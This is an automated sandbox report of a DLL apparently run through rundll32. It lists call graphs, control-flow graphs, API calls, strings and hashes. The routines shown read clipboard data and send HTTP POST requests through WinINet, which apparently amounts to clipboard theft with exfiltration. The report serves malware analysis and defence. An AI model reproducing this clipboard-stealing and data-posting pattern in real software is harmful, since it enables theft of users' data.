6ec4e241 9262->9263 9289 6ec4e32a 9262->9289 9264 6ec4e252 9263->9264 9265 6ec4b90f _free 14 API calls 9263->9265 9266 6ec4e264 9264->9266 9267 6ec4b90f _free 14 API calls 9264->9267 9265->9264 9268 6ec4e276 9266->9268 9269 6ec4b90f _free 14 API calls 9266->9269 9267->9266 9270 6ec4e288 9268->9270 9271 6ec4b90f _free 14 API calls 9268->9271 9269->9268 9272 6ec4e29a 9270->9272 9273 6ec4b90f _free 14 API calls 9270->9273 9271->9270 9274 6ec4e2ac 9272->9274 9275 6ec4b90f _free 14 API calls 9272->9275 9273->9272 9276 6ec4e2be 9274->9276 9277 6ec4b90f _free 14 API calls 9274->9277 9275->9274 9278 6ec4e2d0 9276->9278 9279 6ec4b90f _free 14 API calls 9276->9279 9277->9276 9280 6ec4e2e2 9278->9280 9281 6ec4b90f _free 14 API calls 9278->9281 9279->9278 9282 6ec4e2f4 9280->9282 9283 6ec4b90f _free 14 API calls 9280->9283 9281->9280 9284 6ec4e306 9282->9284 9285 6ec4b90f _free 14 API calls 9282->9285 9283->9282 9286 6ec4b90f _free 14 API calls 9284->9286 9287 6ec4e318 9284->9287 9285->9284 9286->9287 9288 6ec4b90f _free 14 API calls 9287->9288 9287->9289 9288->9289 9289->9240 9291 6ec4e33b 9290->9291 9301 6ec4e393 9290->9301 9292 6ec4e34b 9291->9292 9293 6ec4b90f _free 14 API calls 9291->9293 9294 6ec4e35d 9292->9294 9295 6ec4b90f _free 14 API calls 9292->9295 9293->9292 9296 6ec4e36f 9294->9296 9297 6ec4b90f _free 14 API calls 9294->9297 9295->9294 9298 6ec4e381 9296->9298 9299 6ec4b90f _free 14 API calls 9296->9299 9297->9296 9300 6ec4b90f _free 14 API calls 9298->9300 9298->9301 9299->9298 9300->9301 9301->9241 9303 6ec4df6e 9302->9303 9304 6ec4df8d 9302->9304 9303->9304 9308 6ec4e3cf 9303->9308 9304->9248 9307 6ec4b90f _free 14 API calls 9307->9304 9309 6ec4df87 9308->9309 9310 6ec4e3e0 9308->9310 9309->9307 9311 6ec4e397 _free 14 API calls 9310->9311 9312 6ec4e3e8 9311->9312 9313 6ec4e397 _free 14 API calls 9312->9313 9314 6ec4e3f3 9313->9314 9315 6ec4e397 _free 14 API calls 9314->9315 9316 6ec4e3fe 9315->9316 9317 6ec4e397 _free 14 API calls 9316->9317 9318 6ec4e409 9317->9318 9319 6ec4e397 _free 14 API calls 9318->9319 9320 6ec4e417 9319->9320 9321 6ec4b90f _free 14 API calls 9320->9321 9322 6ec4e422 9321->9322 9323 6ec4b90f _free 14 API calls 9322->9323 9324 6ec4e42d 9323->9324 9325 6ec4b90f _free 14 API calls 9324->9325 9326 6ec4e438 9325->9326 9327 6ec4e397 _free 14 API calls 9326->9327 9328 6ec4e446 9327->9328 9329 6ec4e397 _free 14 API calls 9328->9329 9330 6ec4e454 9329->9330 9331 6ec4e397 _free 14 API calls 9330->9331 9332 6ec4e465 9331->9332 9333 6ec4e397 _free 14 API calls 9332->9333 9334 6ec4e473 9333->9334 9335 6ec4e397 _free 14 API calls 9334->9335 9336 6ec4e481 9335->9336 9337 6ec4b90f _free 14 API calls 9336->9337 9338 6ec4e48c 9337->9338 9339 6ec4b90f _free 14 API calls 9338->9339 9340 6ec4e497 9339->9340 9341 6ec4b90f _free 14 API calls 9340->9341 9342 6ec4e4a2 9341->9342 9343 6ec4b90f _free 14 API calls 9342->9343 9343->9309 9344->9233 9348 6ec4b423 GetLastError 9345->9348 9347 6ec4b68b GetLastError 9347->9200 9349 6ec4b440 9348->9349 9350 6ec4b43a 9348->9350 9351 6ec4d09c _free 6 API calls 9349->9351 9369 6ec4b446 SetLastError 9349->9369 9352 6ec4d05d _free 6 API calls 9350->9352 9353 6ec4b45e 9351->9353 9352->9349 9353->9369 9371 6ec4b8b2 9353->9371 9357 6ec4b476 9359 6ec4d09c _free 6 API calls 9357->9359 9358 6ec4b48d 9360 6ec4d09c _free 6 API calls 9358->9360 9362 6ec4b484 9359->9362 9361 6ec4b499 9360->9361 9363 6ec4b49d 9361->9363 9364 6ec4b4ae 9361->9364 9367 6ec4b90f _free 12 API calls 9362->9367 9365 6ec4d09c _free 6 API calls 9363->9365 9378 6ec4b0ce 9364->9378 9365->9362 9367->9369 9369->9347 9370 6ec4b90f _free 12 API calls 9370->9369 9372 6ec4b8bf _free 9371->9372 9373 6ec4b8ff 9372->9373 9374 6ec4b8ea RtlAllocateHeap 9372->9374 9383 6ec49eaa 9372->9383 9375 6ec4b686 _free 13 API calls 9373->9375 9374->9372 9376 6ec4b46e 9374->9376 9375->9376 9376->9357 9376->9358 9392 6ec4af62 9378->9392 9386 6ec49ed7 9383->9386 9387 6ec49ee3 ___scrt_is_nonwritable_in_current_image 9386->9387 9388 6ec4b7d4 CallUnexpected EnterCriticalSection 9387->9388 9389 6ec49eee 9388->9389 9390 6ec49f2a _free LeaveCriticalSection 9389->9390 9391 6ec49eb5 9390->9391 9391->9372 9393 6ec4af6e ___scrt_is_nonwritable_in_current_image 9392->9393 9406 6ec4b7d4 EnterCriticalSection 9393->9406 9395 6ec4af78 9407 6ec4afa8 9395->9407 9398 6ec4b074 9399 6ec4b080 ___scrt_is_nonwritable_in_current_image 9398->9399 9410 6ec4b7d4 EnterCriticalSection 9399->9410 9401 6ec4b08a 9402 6ec4b255 _free 14 API calls 9401->9402 9403 6ec4b0a2 9402->9403 9411 6ec4b0c2 9403->9411 9406->9395 9408 6ec4b81c CallUnexpected LeaveCriticalSection 9407->9408 9409 6ec4af96 9408->9409 9409->9398 9410->9401 9412 6ec4b81c CallUnexpected LeaveCriticalSection 9411->9412 9413 6ec4b0b0 9412->9413 9413->9370 9415 6ec47f52 9414->9415 9421 6ec468d8 9414->9421 9419 6ec47f60 9415->9419 9422 6ec49150 9415->9422 9416 6ec4918b ___vcrt_FlsSetValue 6 API calls 9418 6ec47f70 9416->9418 9427 6ec47f29 9418->9427 9419->9416 9421->8980 9423 6ec49091 ___vcrt_FlsSetValue 5 API calls 9422->9423 9424 6ec4916a 9423->9424 9425 6ec49182 TlsGetValue 9424->9425 9426 6ec49176 9424->9426 9425->9426 9426->9419 9428 6ec47f40 9427->9428 9429 6ec47f33 9427->9429 9428->9421 9429->9428 9431 6ec4ada7 9429->9431 9432 6ec4b90f _free 14 API calls 9431->9432 9433 6ec4adbf 9432->9433 9433->9428 9440 6ec47f89 9434->9440 9436 6ec468b4 9436->9003 9437 6ec4acdf 9436->9437 9438 6ec4b423 _free 14 API calls 9437->9438 9439 6ec468c0 9438->9439 9439->9006 9439->9007 9441 6ec47f95 GetLastError 9440->9441 9442 6ec47f92 9440->9442 9443 6ec49150 ___vcrt_FlsGetValue 6 API calls 9441->9443 9442->9436 9444 6ec47faa 9443->9444 9445 6ec47fc9 9444->9445 9446 6ec4800f SetLastError 9444->9446 9447 6ec4918b ___vcrt_FlsSetValue 6 API calls 9444->9447 9445->9446 9446->9436 9448 6ec47fc3 __InternalCxxFrameHandler 9447->9448 9448->9445 9449 6ec47feb 9448->9449 9450 6ec4918b ___vcrt_FlsSetValue 6 API calls 9448->9450 9451 6ec4918b ___vcrt_FlsSetValue 6 API calls 9449->9451 9452 6ec47fff 9449->9452 9450->9449 9451->9452 9453 6ec4ada7 ___std_exception_destroy 14 API calls 9452->9453 9453->9445 9455 6ec46914 ___scrt_release_startup_lock 9454->9455 9456 6ec46918 9455->9456 9460 6ec46924 __DllMainCRTStartup@12 9455->9460 9475 6ec4ab46 9456->9475 9459 6ec46931 9459->9014 9460->9459 9478 6ec4a1f0 9460->9478 9545 6ec47f06 InterlockedFlushSList 9463->9545 9467 6ec46abc 9466->9467 9468 6ec46ad2 9467->9468 9549 6ec4acf2 9467->9549 9472 6ec46f1c 9468->9472 9470 6ec46aca 9471 6ec47baf ___scrt_uninitialize_crt 7 API calls 9470->9471 9471->9468 9662 6ec46932 9472->9662 9489 6ec4a858 9475->9489 9479 6ec4a20f 9478->9479 9480 6ec4a1fe 9478->9480 9513 6ec4a0b6 9479->9513 9506 6ec4a296 GetModuleHandleW 9480->9506 9485 6ec4a249 9485->9014 9490 6ec4a864 ___scrt_is_nonwritable_in_current_image 9489->9490 9497 6ec4b7d4 EnterCriticalSection 9490->9497 9492 6ec4a872 9498 6ec4aa56 9492->9498 9497->9492 9499 6ec4a87f 9498->9499 9500 6ec4aa75 9498->9500 9502 6ec4a8a7 9499->9502 9500->9499 9501 6ec4b90f _free 14 API calls 9500->9501 9501->9499 9505 6ec4b81c LeaveCriticalSection 9502->9505 9504 6ec46922 9504->9014 9505->9504 9507 6ec4a203 9506->9507 9507->9479 9508 6ec4a2d9 GetModuleHandleExW 9507->9508 9509 6ec4a2f8 GetProcAddress 9508->9509 9510 6ec4a30d 9508->9510 9509->9510 9511 6ec4a321 FreeLibrary 9510->9511 9512 6ec4a32a 9510->9512 9511->9512 9512->9479 9514 6ec4a0c2 ___scrt_is_nonwritable_in_current_image 9513->9514 9529 6ec4b7d4 EnterCriticalSection 9514->9529 9516 6ec4a0cc 9530 6ec4a103 9516->9530 9518 6ec4a0d9 9534 6ec4a0f7 9518->9534 9521 6ec4a254 9538 6ec4b881 GetPEB 9521->9538 9524 6ec4a283 9527 6ec4a2d9 CallUnexpected 3 API calls 9524->9527 9525 6ec4a263 GetPEB 9525->9524 9526 6ec4a273 GetCurrentProcess TerminateProcess 9525->9526 9526->9524 9528 6ec4a28b ExitProcess 9527->9528 9529->9516 9531 6ec4a10f ___scrt_is_nonwritable_in_current_image 9530->9531 9532 6ec4ab46 __DllMainCRTStartup@12 14 API calls 9531->9532 9533 6ec4a170 CallUnexpected 9531->9533 9532->9533 9533->9518 9537 6ec4b81c LeaveCriticalSection 9534->9537 9536 6ec4a0e5 9536->9485 9536->9521 9537->9536 9539 6ec4a25e 9538->9539 9540 6ec4b89b 9538->9540 9539->9524 9539->9525 9542 6ec4cf80 9540->9542 9543 6ec4cefd _free 5 API calls 9542->9543 9544 6ec4cf9c 9543->9544 9544->9539 9546 6ec47f16 9545->9546 9547 6ec474a6 9545->9547 9546->9547 9548 6ec4ada7 ___std_exception_destroy 14 API calls 9546->9548 9547->9017 9548->9546 9550 6ec4acfd 9549->9550 9551 6ec4ad0f ___scrt_uninitialize_crt 9549->9551 9552 6ec4ad0b 9550->9552 9554 6ec4daab 9550->9554 9551->9470 9552->9470 9557 6ec4d959 9554->9557 9560 6ec4d8ad 9557->9560 9561 6ec4d8b9 ___scrt_is_nonwritable_in_current_image 9560->9561 9568 6ec4b7d4 EnterCriticalSection 9561->9568 9563 6ec4d8c3 ___scrt_uninitialize_crt 9564 6ec4d92f 9563->9564 9569 6ec4d821 9563->9569 9577 6ec4d94d 9564->9577 9568->9563 9570 6ec4d82d ___scrt_is_nonwritable_in_current_image 9569->9570 9580 6ec4dbc8 EnterCriticalSection 9570->9580 9572 6ec4d837 ___scrt_uninitialize_crt 9576 6ec4d870 9572->9576 9581 6ec4da63 9572->9581 9591 6ec4d8a1 9576->9591 9661 6ec4b81c LeaveCriticalSection 9577->9661 9579 6ec4d93b 9579->9552 9580->9572 9582 6ec4da70 9581->9582 9583 6ec4da79 9581->9583 9584 6ec4d959 ___scrt_uninitialize_crt 66 API calls 9582->9584 9594 6ec4d9fe 9583->9594 9587 6ec4da76 9584->9587 9587->9576 9589 6ec4da95 9607 6ec4f1df 9589->9607 9660 6ec4dbdc LeaveCriticalSection 9591->9660 9593 6ec4d88f 9593->9563 9595 6ec4da16 9594->9595 9596 6ec4da3b 9594->9596 9595->9596 9597 6ec4dd4c ___scrt_uninitialize_crt 25 API calls 9595->9597 9596->9587 9600 6ec4dd4c 9596->9600 9598 6ec4da34 9597->9598 9618 6ec4f9d7 9598->9618 9601 6ec4dd6d 9600->9601 9602 6ec4dd58 9600->9602 9601->9589 9603 6ec4b686 _free 14 API calls 9602->9603 9604 6ec4dd5d 9603->9604 9643 6ec499cc 9604->9643 9608 6ec4f1f0 9607->9608 9609 6ec4f1fd 9607->9609 9610 6ec4b686 _free 14 API calls 9608->9610 9611 6ec4f246 9609->9611 9615 6ec4f224 9609->9615 9614 6ec4f1f5 9610->9614 9612 6ec4b686 _free 14 API calls 9611->9612 9613 6ec4f24b 9612->9613 9616 6ec499cc ___std_exception_copy 25 API calls 9613->9616 9614->9587 9646 6ec4f13d 9615->9646 9616->9614 9619 6ec4f9e3 ___scrt_is_nonwritable_in_current_image 9618->9619 9620 6ec4fa03 9619->9620 9621 6ec4f9eb 9619->9621 9622 6ec4fa9e 9620->9622 9627 6ec4fa35 9620->9627 9623 6ec4b673 __dosmaperr 14 API calls 9621->9623 9624 6ec4b673 __dosmaperr 14 API calls 9622->9624 9625 6ec4f9f0 9623->9625 9626 6ec4faa3 9624->9626 9628 6ec4b686 _free 14 API calls 9625->9628 9629 6ec4b686 _free 14 API calls 9626->9629 9630 6ec4effc ___scrt_uninitialize_crt EnterCriticalSection 9627->9630 9636 6ec4f9f8 9628->9636 9631 6ec4faab 9629->9631 9632 6ec4fa3b 9630->9632 9633 6ec499cc ___std_exception_copy 25 API calls 9631->9633 9634 6ec4fa57 9632->9634 9635 6ec4fa6c 9632->9635 9633->9636 9637 6ec4b686 _free 14 API calls 9634->9637 9638 6ec4fac9 ___scrt_uninitialize_crt 60 API calls 9635->9638 9636->9596 9639 6ec4fa5c 9637->9639 9640 6ec4fa67 9638->9640 9641 6ec4b673 __dosmaperr 14 API calls 9639->9641 9642 6ec4fa96 ___scrt_uninitialize_crt LeaveCriticalSection 9640->9642 9641->9640 9642->9636 9644 6ec49968 ___std_exception_copy 25 API calls 9643->9644 9645 6ec499d8 9644->9645 9645->9589 9647 6ec4f149 ___scrt_is_nonwritable_in_current_image 9646->9647 9648 6ec4effc ___scrt_uninitialize_crt EnterCriticalSection 9647->9648 9649 6ec4f158 9648->9649 9650 6ec4f19f 9649->9650 9651 6ec4f0d3 ___scrt_uninitialize_crt 25 API calls 9649->9651 9652 6ec4b686 _free 14 API calls 9650->9652 9653 6ec4f184 FlushFileBuffers 9651->9653 9654 6ec4f1a4 9652->9654 9653->9654 9655 6ec4f190 9653->9655 9656 6ec4f1d3 ___scrt_uninitialize_crt LeaveCriticalSection 9654->9656 9657 6ec4b673 __dosmaperr 14 API calls 9655->9657 9658 6ec4f1bc 9656->9658 9659 6ec4f195 GetLastError 9657->9659 9658->9614 9659->9650 9660->9593 9661->9579 9667 6ec4ad22 9662->9667 9665 6ec4804e ___vcrt_uninitialize_ptd 6 API calls 9666 6ec46f21 9665->9666 9666->9024 9670 6ec4b504 9667->9670 9671 6ec4b50e 9670->9671 9672 6ec46939 9670->9672 9674 6ec4d01e 9671->9674 9672->9665 9675 6ec4cefd _free 5 API calls 9674->9675 9676 6ec4d03a 9675->9676 9677 6ec4d055 TlsFree 9676->9677 9678 6ec4d043 9676->9678 9678->9672

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 6ec41ec0-6ec41f1c call 6ec46751 4 6ec41f22-6ec41f26 0->4 5 6ec4242e-6ec42459 call 6ec45d90 0->5 4->5 7 6ec41f2c-6ec41f30 4->7 10 6ec42483-6ec4249b 5->10 11 6ec4245b-6ec42467 5->11 7->5 9 6ec41f36-6ec42053 call 6ec45d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 7->9 24 6ec4225f-6ec422c8 InternetCloseHandle * 3 9->24 25 6ec42059 9->25 13 6ec423e5-6ec423fd 10->13 14 6ec424a1-6ec424ad 10->14 15 6ec42479-6ec42480 call 6ec4679f 11->15 16 6ec42469-6ec42477 11->16 20 6ec424d2-6ec424ee call 6ec46791 13->20 21 6ec42403-6ec4240f 13->21 18 6ec424b3-6ec424c1 14->18 19 6ec423db-6ec423e2 call 6ec4679f 14->19 15->10 16->15 22 6ec424ef call 6ec499dc 16->22 18->22 27 6ec424c3 18->27 19->13 28 6ec42415-6ec42423 21->28 29 6ec424c8-6ec424cf call 6ec4679f 21->29 44 6ec424f4-6ec424f9 call 6ec46c3c 22->44 32 6ec422ff-6ec4231d 24->32 33 6ec422ca-6ec422d9 24->33 35 6ec42060-6ec42067 25->35 27->19 28->22 42 6ec42429 28->42 29->20 39 6ec42350-6ec42371 32->39 40 6ec4231f-6ec42330 32->40 45 6ec422ef-6ec422fc call 6ec4679f 33->45 46 6ec422db-6ec422e9 33->46 36 6ec4206d-6ec4209b 35->36 37 6ec42259 35->37 48 6ec420a0-6ec420a5 36->48 37->24 52 6ec42373-6ec4237f 39->52 53 6ec4239f-6ec423b7 39->53 49 6ec42346-6ec4234d call 6ec4679f 40->49 50 6ec42332-6ec42340 40->50 42->29 45->32 46->22 46->45 48->48 56 6ec420a7-6ec4214b call 6ec45d90 * 2 48->56 49->39 50->22 50->49 58 6ec42395-6ec4239c call 6ec4679f 52->58 59 6ec42381-6ec4238f 52->59 53->13 61 6ec423b9-6ec423c5 53->61 70 6ec42181-6ec4219a call 6ec46390 56->70 71 6ec4214d-6ec4217f call 6ec49260 56->71 58->53 59->22 59->58 61->19 62 6ec423c7-6ec423d5 61->62 62->19 62->22 76 6ec421a0-6ec421ad 70->76 71->76 77 6ec421af-6ec421ba 76->77 78 6ec421da-6ec421e7 76->78 81 6ec421d0-6ec421d7 call 6ec4679f 77->81 82 6ec421bc-6ec421ca 77->82 79 6ec42218-6ec42223 78->79 80 6ec421e9-6ec421f8 78->80 79->44 86 6ec42229-6ec42253 InternetReadFile 79->86 84 6ec4220e-6ec42215 call 6ec4679f 80->84 85 6ec421fa-6ec42208 80->85 81->78 82->22 82->81 84->79 85->22 85->84 86->35 86->37
            APIs
            • std::_Xinvalid_argument.LIBCPMT ref: 6EC41EC5
              • Part of subcall function 6EC46751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6EC4675D
            • InternetOpenW.WININET(6EC5BA54,00000000,00000000,00000000,00000000), ref: 6EC41FA7
            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EC41FCE
            • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EC41FF8
            • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EC42031
            • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EC4204B
            • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EC4224B
            • InternetCloseHandle.WININET(00000000), ref: 6EC42266
            • InternetCloseHandle.WININET(?), ref: 6EC4226E
            • InternetCloseHandle.WININET(?), ref: 6EC42276
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
            • String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
            • API String ID: 4066372336-370044323
            • Opcode ID: 25d9d0c48b45032f944ff8b86c6e65ba089db4de5dd59c64b97e033e1e0ef60f
            • Instruction ID: 8e6a01cce139e7c5b948e87f11dc5fd641a194c328ce8c9900af40cf3c416f3b
            • Opcode Fuzzy Hash: 25d9d0c48b45032f944ff8b86c6e65ba089db4de5dd59c64b97e033e1e0ef60f
            • Instruction Fuzzy Hash: 2EF1D1B0A10118DBEB28CF68CC94BDDBBB5EF45304F5041D8E609AB285EB759AC4CF55

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 207 6ec431b0-6ec433a6 211 6ec433a8-6ec433b4 207->211 212 6ec433db-6ec433f7 call 6ec46791 207->212 213 6ec433b6-6ec433c4 211->213 214 6ec433d1-6ec433d8 call 6ec4679f 211->214 213->214 216 6ec433f8-6ec434f3 call 6ec499dc call 6ec45ed0 call 6ec45d90 213->216 214->212 227 6ec434f5-6ec43501 216->227 228 6ec4351d-6ec43530 216->228 229 6ec43513-6ec4351a call 6ec4679f 227->229 230 6ec43503-6ec43511 227->230 229->228 230->229 231 6ec43531-6ec436d1 call 6ec499dc call 6ec45d90 230->231 241 6ec43734-6ec43750 call 6ec46791 231->241 242 6ec436d3-6ec436df 231->242 244 6ec436e1-6ec436ef 242->244 245 6ec4372a-6ec43731 call 6ec4679f 242->245 244->245 246 6ec43751-6ec43823 call 6ec499dc call 6ec45ed0 call 6ec46060 244->246 245->241 257 6ec43825-6ec43831 246->257 258 6ec4384d-6ec4385e 246->258 259 6ec43843-6ec4384a call 6ec4679f 257->259 260 6ec43833-6ec43841 257->260 259->258 260->259 261 6ec4385f-6ec438d5 call 6ec499dc OpenClipboard 260->261 266 6ec43a87-6ec43a99 261->266 267 6ec438db-6ec438ea GetClipboardData 261->267 268 6ec438f0-6ec438fc GlobalLock 267->268 269 6ec43a81 CloseClipboard 267->269 270 6ec43902-6ec43921 WideCharToMultiByte 268->270 271 6ec43a7a-6ec43a7b GlobalUnlock 268->271 269->266 270->271 272 6ec43927-6ec43a50 call 6ec46230 WideCharToMultiByte call 6ec45d90 270->272 271->269 272->271 282 6ec43a52-6ec43a5e 272->282 283 6ec43a70-6ec43a77 call 6ec4679f 282->283 284 6ec43a60-6ec43a6e 282->284 283->271 284->283 285 6ec43a9a-6ec43b6d call 6ec499dc call 6ec45d90 call 6ec45b80 * 2 call 6ec41ed0 call 6ec45b80 call 6ec45d90 call 6ec431b0 284->285
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
            • API String ID: 0-2251221455
            • Opcode ID: 49ca45bf4006efec9a4158992c9c6de02b64d795d7854926cedc2f8132c759a0
            • Instruction ID: af321846942a34ce4c6d597a0f9032c7e2c90a606371c1f229d61e5ae65ab3ae
            • Opcode Fuzzy Hash: 49ca45bf4006efec9a4158992c9c6de02b64d795d7854926cedc2f8132c759a0
            • Instruction Fuzzy Hash: 0DF11870A00209EFEB04CFA8CD58BDEBBF9EF85714F504619E811AB7C4EB7599448B91

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 90 6ec41ed0-6ec41f1c 91 6ec41f22-6ec41f26 90->91 92 6ec4242e-6ec42459 call 6ec45d90 90->92 91->92 94 6ec41f2c-6ec41f30 91->94 97 6ec42483-6ec4249b 92->97 98 6ec4245b-6ec42467 92->98 94->92 96 6ec41f36-6ec42053 call 6ec45d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 94->96 111 6ec4225f-6ec422c8 InternetCloseHandle * 3 96->111 112 6ec42059 96->112 100 6ec423e5-6ec423fd 97->100 101 6ec424a1-6ec424ad 97->101 102 6ec42479-6ec42480 call 6ec4679f 98->102 103 6ec42469-6ec42477 98->103 107 6ec424d2-6ec424ee call 6ec46791 100->107 108 6ec42403-6ec4240f 100->108 105 6ec424b3-6ec424c1 101->105 106 6ec423db-6ec423e2 call 6ec4679f 101->106 102->97 103->102 109 6ec424ef call 6ec499dc 103->109 105->109 114 6ec424c3 105->114 106->100 115 6ec42415-6ec42423 108->115 116 6ec424c8-6ec424cf call 6ec4679f 108->116 131 6ec424f4-6ec424f9 call 6ec46c3c 109->131 119 6ec422ff-6ec4231d 111->119 120 6ec422ca-6ec422d9 111->120 122 6ec42060-6ec42067 112->122 114->106 115->109 129 6ec42429 115->129 116->107 126 6ec42350-6ec42371 119->126 127 6ec4231f-6ec42330 119->127 132 6ec422ef-6ec422fc call 6ec4679f 120->132 133 6ec422db-6ec422e9 120->133 123 6ec4206d-6ec4209b 122->123 124 6ec42259 122->124 135 6ec420a0-6ec420a5 123->135 124->111 139 6ec42373-6ec4237f 126->139 140 6ec4239f-6ec423b7 126->140 136 6ec42346-6ec4234d call 6ec4679f 127->136 137 6ec42332-6ec42340 127->137 129->116 132->119 133->109 133->132 135->135 143 6ec420a7-6ec4214b call 6ec45d90 * 2 135->143 136->126 137->109 137->136 145 6ec42395-6ec4239c call 6ec4679f 139->145 146 6ec42381-6ec4238f 139->146 140->100 148 6ec423b9-6ec423c5 140->148 157 6ec42181-6ec4219a call 6ec46390 143->157 158 6ec4214d-6ec4217f call 6ec49260 143->158 145->140 146->109 146->145 148->106 149 6ec423c7-6ec423d5 148->149 149->106 149->109 163 6ec421a0-6ec421ad 157->163 158->163 164 6ec421af-6ec421ba 163->164 165 6ec421da-6ec421e7 163->165 168 6ec421d0-6ec421d7 call 6ec4679f 164->168 169 6ec421bc-6ec421ca 164->169 166 6ec42218-6ec42223 165->166 167 6ec421e9-6ec421f8 165->167 166->131 173 6ec42229-6ec42253 InternetReadFile 166->173 171 6ec4220e-6ec42215 call 6ec4679f 167->171 172 6ec421fa-6ec42208 167->172 168->165 169->109 169->168 171->166 172->109 172->171 173->122 173->124
            APIs
            • InternetOpenW.WININET(6EC5BA54,00000000,00000000,00000000,00000000), ref: 6EC41FA7
            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EC41FCE
            • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EC41FF8
            • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EC42031
            • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EC4204B
            • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EC4224B
            • InternetCloseHandle.WININET(00000000), ref: 6EC42266
            • InternetCloseHandle.WININET(?), ref: 6EC4226E
            • InternetCloseHandle.WININET(?), ref: 6EC42276
            Strings
            • Content-Type: application/x-www-form-urlencoded, xrefs: 6EC41F71
            • POST, xrefs: 6EC41FF2
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
            • String ID: Content-Type: application/x-www-form-urlencoded$POST
            • API String ID: 1354133546-2387545335
            • Opcode ID: 48d43d6b6243534ab82c0b2b8e4bae4fcf9d3050903931e79897f679c43771e5
            • Instruction ID: 1ceac5d1180fe4c695fed5af1336b07ec2e119d232547e9a742721f15d5a9350
            • Opcode Fuzzy Hash: 48d43d6b6243534ab82c0b2b8e4bae4fcf9d3050903931e79897f679c43771e5
            • Instruction Fuzzy Hash: 32F1C0B0A10118DBEB28CF68CC94BDDBBB5EF45304F508198E609AB2C5EB759AC4CF55

            Control-flow Graph

            APIs
            • __RTC_Initialize.LIBCMT ref: 6EC46EC1
            • ___scrt_uninitialize_crt.LIBCMT ref: 6EC46EDB
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: Initialize___scrt_uninitialize_crt
            • String ID:
            • API String ID: 2442719207-0
            • Opcode ID: 45b7c64cf6189bed5a3bcf6e8d7db093ec0ca55fffd0a5e352f9260a7f4ad5b0
            • Instruction ID: e55e0c597803ef3bdd5a5365669e6bd8faaf51d2ac7c0c5fb51a103c5ddb6cdd
            • Opcode Fuzzy Hash: 45b7c64cf6189bed5a3bcf6e8d7db093ec0ca55fffd0a5e352f9260a7f4ad5b0
            • Instruction Fuzzy Hash: B541D672D11A59EFDB218FE5C940BDE3BBDEF40794F10491AE81567288F7314911AB90

            Control-flow Graph

            • Executed
            • Not Executed
